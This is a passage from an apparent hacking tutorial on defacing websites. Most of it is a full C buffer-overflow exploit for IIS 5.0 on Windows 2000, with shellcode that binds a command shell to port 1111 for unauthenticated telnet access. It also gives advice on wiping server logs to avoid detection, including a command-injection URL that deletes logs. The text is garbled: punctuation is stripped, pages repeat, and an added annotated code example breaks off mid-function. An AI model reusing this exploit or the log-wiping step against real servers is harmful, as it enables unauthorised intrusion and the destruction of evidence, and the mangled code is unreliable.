x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89

x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89

x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a

x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3

x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45

xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8

xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a

x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32

xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0

xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0

xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55

xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10

x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff

x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33

xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55

xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50

xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0

xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47

x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c

xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff

xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff

x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89

x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50

x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85

xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53

xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d

x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff

x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90

x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0

x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8

x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85

x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff

xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4

xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a

xffxffx95x18xffxffxff

char s1=POST HTTP11rn

char s2=Accept rn

char s4=Content-Type applicationx-www-

form-urlencodedrn

char s5=Transfer-Encoding

chunkedrnrn

char sc=0rnrnrn

char shellcodebuff[10248]

memset(shellcodebuff0x90sizeof

(shellcodebuff))

memcpy(ampshellcodebuff[sizeof(shellcodebuff)-

strlen(shellcode)-1]shellcodestrlen(shellcode))

shellcodebuff[sizeof(shellcodebuff)-1] = 0

char sendbuff[102416]

memset(sendbuff0102416)

sprintf(sendbuffsss HTTP11rnsHost

srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile

shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)

int sendlen=strlen(sendbuff)

(DWORD )strstr(sendbuffBBBB) = jmpaddr

(DWORD )strstr(sendbuffAAAA) = srcdata

result=send(ssendbuffsendlen0)

if(result == -1 )

puts(Send shellcode error)

return -1

memset(buff04096)

result=recv(sbuffsizeof(buff)0)

if(strstr(bufflthtmlgt) = NULL)

shutdown(s0)

closesocket(s)

puts(Send shellcode errorTry again)

return -1

shutdown(s0)

closesocket(s)

printf(nUse lttelnet s 1111gt to connect to the hostndestIP)

puts(If you cannot connect to the hosttry run this program again)

return 0

IMPLEMENTATION OF THE CODE

To implement the C code you must compile it and run Now you

must be wondering what is the use of this code Actually the C

code causes an overflow in IIS on Windows 2000 and commands

the system to bind a shell to the source Ip on port 1111 So once

the exploit works there will be a shell bind on port 1111 on the

target system To workout you must telnet the target IP into port

1111 through this you will be connected to the system without

any kind of authentication

Various Security Measures

Website defacement has become a terrible problem for IT

(Information Technology) based companies Everyday thousands

of websites are defaced Well even Government websites are

defaced for different reasons the most common reason is cyber

war Like in reality there are wars between two rival countries

similarly in wired world there are cyber wars

If you want to see the web attack archive visit the following site

httpdefacedalldasorg

Now some security measures for the system administrators

- First of all you must coordinate and organize your web root

with suitable directories What I mean to say is that you must

organize your files like images in an image directory one for

server side contents and so on so forth If you donrsquot configure your

web root properly then your web server will be prone to many

attacks

- You must be aware of the latest vulnerabilities visit these sites

httpwwwsecurityfocuscom

httpwwwpacketstormorg

httpwwwguininskicom

httpwwwinsecureorg

httpwwwsecuriteamcom

httpwwwslashdotorg

httpwwwtechnotroniccom

Well every web server is vulnerable but you must not fear you

must download the latest patches for the particular vulnerability

Well the last thing is that you must be able to predict the moves

of a malicious cracker or a script kiddie You need to know how a

cracker breaks into your site or web server you need to know the

motive behind the attack and you must think act and work like a

hacker and take the cracker out from the root

So this completes my tutorial on Defacing websites I hope you

have understood the involutions of web servers

Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM

Page 23: Defacing Website

Well you must be familiar with server softwares like Apache

Microsoft IIS etc So you must be knowing about the log files

which records each and every request made by the server As it

records everything system administrators will have no problem

catching the malicious cracker or script kiddie as the log file will

have the IP (Internet Protocol) address and through the IP

address you can trace the cracker or the script kiddie

NOTE Read my tutorial on Gathering Information of Remote Host

TIP If you do not want to get busted you must clear the log files

after you break into a web server

CLEARING LOGS

You must clear yoursquore the logs in order to save yourself from

getting busted So you can use cross site scripting vulnerability

to clear the log files You can do by executing the following URL

httpwwwtargetcomcgi-bintest-cgibat|DEL+log

NOTE The above URL can be used in Apache server software

In case of IIS on Windows 2000 you can use the following method

to get a DOS Shell through telnet

The Following code exploits a buffer overflow in IIS 5 on Windows

2000 server and opens port 1111 and binds a shell to it If the

exploit is successful then all you have to do is use telnet to

connect to port 1111 of target and the system is yours

Windows 2000 Server Exploit By CHINANSL Security Team

Test on Windows 2000 Chinese Version IIS 50 not patched

WarningTHIS PROGRAM WILL ONLY TEST

CHINANSL Technology COLTD httpwwwchinanslcom

kejichinanslcom

include stdafxh

include ltstdiohgt

include ltstdlibhgt

include ltstringhgt

include ltwindowshgt

pragma comment (libWs2_32)

int main(int argc char argv[])

if(argc = 4)

printf(s ip port aspfilepathnnargv[0])

printf( ie s 127001 80 iisstartaspnargv[0])

puts( programed by kejichinanslcom)

return 0

DWORD srcdata=0x01e2fb1c-40x00457474

address of SHELLCODE

DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec

x1cxfbxe6x01 x0cxfbxe6x01

char destIP=argv[1]

char destFile=argv[3]

int webport=atoi(argv[2])

char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes

WSADATA ws

SOCKET s

long result=0

if(WSAStartup(0x0101ampws) = 0)

puts(WSAStartup() error)

return -1

struct sockaddr_in addr

addrsin_family=AF_INET

addrsin_port=htons(webport)

addrsin_addrs_addr=inet_addr(destIP)

s=socket(AF_INETSOCK_STREAM0)

if(s==-1)

puts(Socket create error)

return -1

if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)

puts(Cannot connect to the specified host)

return -1

char buff[4096]

char

shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8

9

x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32

xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab

x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f

xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89

x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0

x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89

x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe

x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56

xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc

xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89

x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89

x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89

x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a

x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3

x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45

xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8

xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a

x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32

xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0

xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0

xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55

xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10

x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff

x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33

xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55

xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50

xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0

xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47

x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c

xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff

xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff

x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89

x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50

x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85

xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53

xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d

x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff

x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90

x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0

x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8

x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85

x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff

xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4

xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a

xffxffx95x18xffxffxff

char s1=POST HTTP11rn

char s2=Accept rn

char s4=Content-Type applicationx-www-

form-urlencodedrn

char s5=Transfer-Encoding

chunkedrnrn

char sc=0rnrnrn

char shellcodebuff[10248]

memset(shellcodebuff0x90sizeof

(shellcodebuff))

memcpy(ampshellcodebuff[sizeof(shellcodebuff)-

strlen(shellcode)-1]shellcodestrlen(shellcode))

shellcodebuff[sizeof(shellcodebuff)-1] = 0

char sendbuff[102416]

memset(sendbuff0102416)

sprintf(sendbuffsss HTTP11rnsHost

srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile

shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)

int sendlen=strlen(sendbuff)

(DWORD )strstr(sendbuffBBBB) = jmpaddr

(DWORD )strstr(sendbuffAAAA) = srcdata

result=send(ssendbuffsendlen0)

if(result == -1 )

puts(Send shellcode error)

return -1

memset(buff04096)

result=recv(sbuffsizeof(buff)0)

if(strstr(bufflthtmlgt) = NULL)

shutdown(s0)

closesocket(s)

puts(Send shellcode errorTry again)

return -1

shutdown(s0)

closesocket(s)

printf(nUse lttelnet s 1111gt to connect to the hostndestIP)

puts(If you cannot connect to the hosttry run this program again)

return 0

IMPLEMENTATION OF THE CODE

To implement the C code you must compile it and run Now you

must be wondering what is the use of this code Actually the C

code causes an overflow in IIS on Windows 2000 and commands

the system to bind a shell to the source Ip on port 1111 So once

the exploit works there will be a shell bind on port 1111 on the

target system To workout you must telnet the target IP into port

1111 through this you will be connected to the system without

any kind of authentication

Various Security Measures

Website defacement has become a terrible problem for IT

(Information Technology) based companies Everyday thousands

of websites are defaced Well even Government websites are

defaced for different reasons the most common reason is cyber

war Like in reality there are wars between two rival countries

similarly in wired world there are cyber wars

If you want to see the web attack archive visit the following site

httpdefacedalldasorg

Now some security measures for the system administrators

- First of all you must coordinate and organize your web root

with suitable directories What I mean to say is that you must

organize your files like images in an image directory one for

server side contents and so on so forth If you donrsquot configure your

web root properly then your web server will be prone to many

attacks

- You must be aware of the latest vulnerabilities visit these sites

httpwwwsecurityfocuscom

httpwwwpacketstormorg

httpwwwguininskicom

httpwwwinsecureorg

httpwwwsecuriteamcom

httpwwwslashdotorg

httpwwwtechnotroniccom

Well every web server is vulnerable but you must not fear you

must download the latest patches for the particular vulnerability

Well the last thing is that you must be able to predict the moves

of a malicious cracker or a script kiddie You need to know how a

cracker breaks into your site or web server you need to know the

motive behind the attack and you must think act and work like a

hacker and take the cracker out from the root

So this completes my tutorial on Defacing websites I hope you

have understood the involutions of web servers

Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM

Page 24: Defacing Website

Test on Windows 2000 Chinese Version IIS 50 not patched

WarningTHIS PROGRAM WILL ONLY TEST

CHINANSL Technology COLTD httpwwwchinanslcom

kejichinanslcom

include stdafxh

include ltstdiohgt

include ltstdlibhgt

include ltstringhgt

include ltwindowshgt

pragma comment (libWs2_32)

int main(int argc char argv[])

if(argc = 4)

printf(s ip port aspfilepathnnargv[0])

printf( ie s 127001 80 iisstartaspnargv[0])

puts( programed by kejichinanslcom)

return 0

DWORD srcdata=0x01e2fb1c-40x00457474

address of SHELLCODE

DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec

x1cxfbxe6x01 x0cxfbxe6x01

char destIP=argv[1]

char destFile=argv[3]

int webport=atoi(argv[2])

char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes

WSADATA ws

SOCKET s

long result=0

if(WSAStartup(0x0101ampws) = 0)

puts(WSAStartup() error)

return -1

struct sockaddr_in addr

addrsin_family=AF_INET

addrsin_port=htons(webport)

addrsin_addrs_addr=inet_addr(destIP)

s=socket(AF_INETSOCK_STREAM0)

if(s==-1)

puts(Socket create error)

return -1

if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)

puts(Cannot connect to the specified host)

return -1

char buff[4096]

char

shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8

9

x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32

xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab

x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f

xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89

x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0

x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89

x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe

x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56

xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc

xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89

x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89

x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89

x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a

x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3

x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45

xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8

xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a

x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32

xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0

xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0

xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55

xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10

x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff

x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33

xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55

xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50

xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0

xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47

x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c

xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff

xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff

x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89

x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50

x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85

xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53

xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d

x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff

x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90

x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0

x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8

x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85

x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff

xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4

xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a

xffxffx95x18xffxffxff

char s1=POST HTTP11rn

char s2=Accept rn

char s4=Content-Type applicationx-www-

form-urlencodedrn

char s5=Transfer-Encoding

chunkedrnrn

char sc=0rnrnrn

char shellcodebuff[10248]

memset(shellcodebuff0x90sizeof

(shellcodebuff))

memcpy(ampshellcodebuff[sizeof(shellcodebuff)-

strlen(shellcode)-1]shellcodestrlen(shellcode))

shellcodebuff[sizeof(shellcodebuff)-1] = 0

char sendbuff[102416]

memset(sendbuff0102416)

sprintf(sendbuffsss HTTP11rnsHost

srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile

shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)

int sendlen=strlen(sendbuff)

(DWORD )strstr(sendbuffBBBB) = jmpaddr

(DWORD )strstr(sendbuffAAAA) = srcdata

result=send(ssendbuffsendlen0)

if(result == -1 )

puts(Send shellcode error)

return -1

memset(buff04096)

result=recv(sbuffsizeof(buff)0)

if(strstr(bufflthtmlgt) = NULL)

shutdown(s0)

closesocket(s)

puts(Send shellcode errorTry again)

return -1

shutdown(s0)

closesocket(s)

printf(nUse lttelnet s 1111gt to connect to the hostndestIP)

puts(If you cannot connect to the hosttry run this program again)

return 0

IMPLEMENTATION OF THE CODE

To implement the C code you must compile it and run Now you

must be wondering what is the use of this code Actually the C

code causes an overflow in IIS on Windows 2000 and commands

the system to bind a shell to the source Ip on port 1111 So once

the exploit works there will be a shell bind on port 1111 on the

target system To workout you must telnet the target IP into port

1111 through this you will be connected to the system without

any kind of authentication

Various Security Measures

Website defacement has become a terrible problem for IT

(Information Technology) based companies Everyday thousands

of websites are defaced Well even Government websites are

defaced for different reasons the most common reason is cyber

war Like in reality there are wars between two rival countries

similarly in wired world there are cyber wars

If you want to see the web attack archive visit the following site

httpdefacedalldasorg

Now some security measures for the system administrators

- First of all you must coordinate and organize your web root

with suitable directories What I mean to say is that you must

organize your files like images in an image directory one for

server side contents and so on so forth If you donrsquot configure your

web root properly then your web server will be prone to many

attacks

- You must be aware of the latest vulnerabilities visit these sites

httpwwwsecurityfocuscom

httpwwwpacketstormorg

httpwwwguininskicom

httpwwwinsecureorg

httpwwwsecuriteamcom

httpwwwslashdotorg

httpwwwtechnotroniccom

Well every web server is vulnerable but you must not fear you

must download the latest patches for the particular vulnerability

Well the last thing is that you must be able to predict the moves

of a malicious cracker or a script kiddie You need to know how a

cracker breaks into your site or web server you need to know the

motive behind the attack and you must think act and work like a

hacker and take the cracker out from the root

So this completes my tutorial on Defacing websites I hope you

have understood the involutions of web servers

Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM

Page 25: Defacing Website

int webport=atoi(argv[2])

char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes

WSADATA ws

SOCKET s

long result=0

if(WSAStartup(0x0101ampws) = 0)

puts(WSAStartup() error)

return -1

struct sockaddr_in addr

addrsin_family=AF_INET

addrsin_port=htons(webport)

addrsin_addrs_addr=inet_addr(destIP)

s=socket(AF_INETSOCK_STREAM0)

if(s==-1)

puts(Socket create error)

return -1

if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)

puts(Cannot connect to the specified host)

return -1

char buff[4096]

char

shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8

9

x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32

xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab

x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f

xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89

x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0

x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89

x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe

x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56

xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc

xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89

x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89

x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89

x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a

x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3

x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45

xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8

xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a

x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32

xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0

xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0

xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55

"\xe0\x33\xc0\x50\x6a\x01\x6a\x02\xff\x55\xdc\x89\x45\xc4\x6a\x10"
"\x8d\x45\xa0\x50\xff\x75\xc4\xff\x55\xd8\x6a\x01\xff\x75\xc4\xff"
"\x55\xd4\x33\xc0\x50\x50\xff\x75\xc4\xff\x55\xd0\x89\x45\xc0\x33"
"\xff\x57\x8d\x45\x8c\x50\x8d\x45\x98\x50\x8d\x45\x9c\x50\xff\x55"
"\xf4\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x90\x50\x8d\x45\x94\x50"
"\xff\x55\xf4\xfc\x8d\xbd\x38\xff\xff\xff\x33\xc9\xb1\x44\x32\xc0"
"\xf3\xaa\x8d\xbd\x38\xff\xff\xff\x33\xc0\x66\xb8\x01\x01\x89\x47"
"\x2c\x8b\x45\x94\x89\x47\x38\x8b\x45\x98\x89\x47\x40\x89\x47\x3c"
"\xb8\xf0\xff\xff\xff\x33\xdb\x03\xe0\x8b\xc4\x50\x8d\x85\x38\xff"
"\xff\xff\x50\x53\x53\x53\x6a\x01\x53\x53\x8d\x4d\x80\x51\x53\xff"
"\x55\xf0\x33\xc0\xb4\x04\x50\x6a\x40\xff\x95\x34\xff\xff\xff\x89"
"\x85\x30\xff\xff\xff\x90\x33\xdb\x53\x8d\x85\x2c\xff\xff\xff\x50"
"\x53\x53\x53\xff\x75\x9c\xff\x55\xec\x8b\x85\x2c\xff\xff\xff\x85"
"\xc0\x74\x49\x33\xdb\x53\xb7\x04\x8d\x85\x2c\xff\xff\xff\x50\x53"
"\xff\xb5\x30\xff\xff\xff\xff\x75\x9c\xff\x55\xe8\x85\xc0\x74\x6d"
"\x33\xc0\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff\xff\xff"
"\x75\xc0\xff\x55\xcc\x83\xf8\xff\x74\x53\xeb\x10\x90\x90\x90\x90"
"\x90\x90\x6a\x32\xff\x95\x28\xff\xff\xff\xeb\x99\x90\x90\x33\xc0"
"\x50\xb4\x04\x50\xff\xb5\x30\xff\xff\xff\xff\x75\xc0\xff\x55\xc8"
"\x83\xf8\xff\x74\x28\x89\x85\x2c\xff\xff\xff\x33\xc0\x50\x8d\x85"
"\x2c\xff\xff\xff\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff"
"\xff\xff\x75\x90\xff\x55\xe4\x85\xc0\x74\x02\xeb\xb4\xff\x75\xc4"
"\xff\x95\x1c\xff\xff\xff\xff\x75\xc0\xff\x95\x1c\xff\xff\xff\x6a"
"\xff\xff\x95\x18\xff\xff\xff";

/* Pieces of the HTTP request. destFile, destIP, pad, srcdata, jmpaddr, the
 * socket s, buff and result are set up earlier in the program (not shown in
 * this excerpt). */
char *s1 = "POST ";  /* the extracted page shows "POST HTTP11rn" here; the " HTTP/1.1\r\n"
                        is supplied by the sprintf format below, so only the method fits */
char *s2 = "Accept: */*\r\n";  /* value after the colon lost in extraction; */* assumed */
char *s4 = "Content-Type: application/x-www-form-urlencoded\r\n";
char *s5 = "Transfer-Encoding: chunked\r\n\r\n";
char *sc = "0\r\n\r\n\r\n";  /* last-chunk: terminates the chunked body */

/* 8 KB of NOP sled (0x90) with the shellcode at the very end; this whole
 * buffer is placed in the request-target, right after the file name. */
char shellcodebuff[1024 * 8];
memset(shellcodebuff, 0x90, sizeof(shellcodebuff));
memcpy(&shellcodebuff[sizeof(shellcodebuff) - strlen(shellcode) - 1], shellcode, strlen(shellcode));
shellcodebuff[sizeof(shellcodebuff) - 1] = 0;

/* Chunked body: one 0x10-byte chunk (pad), then two 4-byte chunks that are
 * patched below with srcdata and jmpaddr. */
char sendbuff[1024 * 16];
memset(sendbuff, 0, 1024 * 16);
sprintf(sendbuff, "%s%s%s HTTP/1.1\r\n%sHost: %s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n%s",
        s1, destFile, shellcodebuff, s2, destIP, s4, s5, pad, sc);
int sendlen = strlen(sendbuff);
*(DWORD *)strstr(sendbuff, "BBBB") = jmpaddr;   /* address execution is redirected to */
*(DWORD *)strstr(sendbuff, "AAAA") = srcdata;   /* value written alongside it */

result = send(s, sendbuff, sendlen, 0);
if (result == -1) {
    puts("Send shellcode error");
    return -1;
}

/* If the server still answers with a normal HTML page, the overflow did not
 * take; this is a heuristic, not proof of success. */
memset(buff, 0, 4096);
result = recv(s, buff, sizeof(buff), 0);
if (strstr(buff, "<html>") != NULL) {
    shutdown(s, 0);
    closesocket(s);
    puts("Send shellcode error, try again");
    return -1;
}
shutdown(s, 0);
closesocket(s);
printf("\nUse <telnet %s 1111> to connect to the host\n", destIP);
puts("If you cannot connect to the host, try running this program again");
return 0;

IMPLEMENTATION OF THE CODE

To use the C code you must compile it and run it against the target. What the code does: it sends a POST request with Transfer-Encoding: chunked to an IIS server on Windows 2000 (IIS 5.0), with an 8 KB NOP sled and the shellcode placed in the request-target. The chunked body triggers an overflow in IIS, and the two 4-byte chunks (the AAAA and BBBB markers, overwritten with srcdata and jmpaddr) redirect execution into the sled and the shellcode. The shellcode loads kernel32 and ws2_32, creates a listening socket on TCP port 1111 (the bytes 04 57, port 0x0457 = 1111 in network order, are visible in the shellcode) and attaches cmd.exe to it. So once the exploit works there is a command shell bound to port 1111 on the target system. To use it, telnet to the target IP on port 1111; you are connected to the system without any kind of authentication, with the privileges of the IIS process. Note that the program only checks whether the server still returned an HTML page; a silent connection drop is treated as success, so if telnet cannot connect, the overflow simply did not land (wrong jmpaddr for that build, or a patched server).
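The request layout described above, as an added example; this is not code from the tutorial or from the exploit's author. It builds the same kind of chunked POST (path, sled, shellcode, a 16-byte pad chunk, two 4-byte chunks, last-chunk), patches the AAAA/BBBB markers the way the exploit does, and then decodes the chunked body with a minimal decoder written here (not IIS's) to show exactly which 24 bytes reach the server. The path /default.asp, host 192.0.2.10, the 16-byte pad, the two 32-bit values and the four int3 bytes standing in for shellcode are placeholders, and the sled is shortened from 1024*8 to 64 bytes.

```c
/* Added example, not code from the tutorial; all values are placeholders. */
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SLED_LEN 64 /* the exploit uses 1024*8 bytes of 0x90; shortened here */

/* memmem-style search that tolerates NUL bytes (the exploit's strstr does not). */
static size_t find_bytes(const unsigned char *buf, size_t len, const char *pat)
{
    size_t plen = strlen(pat);
    for (size_t i = 0; i + plen <= len; i++)
        if (memcmp(buf + i, pat, plen) == 0) return i;
    return (size_t)-1;
}

/* Little-endian overwrite of a 4-byte marker: what *(DWORD *)strstr() = v does on x86. */
static int patch_marker(unsigned char *buf, size_t len, const char *marker, uint32_t v)
{
    size_t off = find_bytes(buf, len, marker);
    if (off == (size_t)-1) return -1;
    for (int i = 0; i < 4; i++) buf[off + i] = (unsigned char)(v >> (8 * i));
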